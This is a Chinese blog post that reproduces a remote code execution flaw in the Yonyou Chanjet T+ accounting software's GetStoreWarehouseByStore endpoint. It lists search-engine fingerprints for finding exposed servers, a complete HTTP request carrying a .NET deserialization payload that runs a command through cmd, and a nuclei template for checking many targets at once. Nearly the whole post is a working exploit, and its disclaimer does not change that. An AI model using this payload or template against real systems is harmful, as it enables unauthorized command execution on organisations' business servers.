（附nuclei 批量验证文件）用友畅捷通T+ GetStoreWarehouseByStore RCE漏洞复现

最新推荐文章于 2024-08-26 10:17:18 发布

nglj9527

最新推荐文章于 2024-08-26 10:17:18 发布

阅读量304

点赞数

分类专栏：漏洞复现文章标签：安全

本文链接：https://blog.csdn.net/nglj9527/article/details/139308753

版权

漏洞复现专栏收录该内容

11 篇文章 2 订阅

订阅专栏

（附nuclei 批量验证文件）用友畅捷通T+ GetStoreWarehouseByStore RCE漏洞复现

声明
本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

1、漏洞简介

用友畅捷通T+ GetStoreWarehouseByStore RCE漏洞可执行命令。

2、资产指纹

fofa：app=“畅捷通-TPlus”
hunter： app.name=“畅捷通 T+”

3、漏洞复现

发送以下请求执行whoami命令进行测试

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: {{Hostname}}
User-Agent: Java/1.8.0_381
Content-Length: 579
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-type: application/x-www-form-urlencoded
X-Ajaxpro-Method: GetStoreWarehouseByStore
Accept-Encoding: gzip, deflate

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c whoami >ee.txt"
      }
    }
  }
}

在这里插入图片描述

4、nuclei yaml文件

id: chanjettplus-rce

info:
  name: chanjettplus rce
  author: xxxx
  severity: critical
  description: |
    畅捷通反序列化可执行命令
  tags: chanjettplus,rce

http:
  - raw:
    - |
      POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
      X-Ajaxpro-Method: GetStoreWarehouseByStore
      User-Agent: Java/1.8.0_381
      Host: {{Hostname}}
      Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
      Content-type: application/x-www-form-urlencoded
      Content-Length: 566
      Connection: close
      
      {
        "storeID":{
          "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
          "MethodName":"Start",
          "ObjectInstance":{
            "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "StartInfo":{
              "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
              "FileName":"cmd",
              "Arguments":"/c whoami >ee.txt"
            }
          }
        }
      }
    - |
      GET /tplus/ee.txt HTTP/1.1
      Host: {{Hostname}}
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36


    matchers:
      - type: dsl
        dsl:
          - 'status_code_2==200 && contains_all(body_2,"sys")'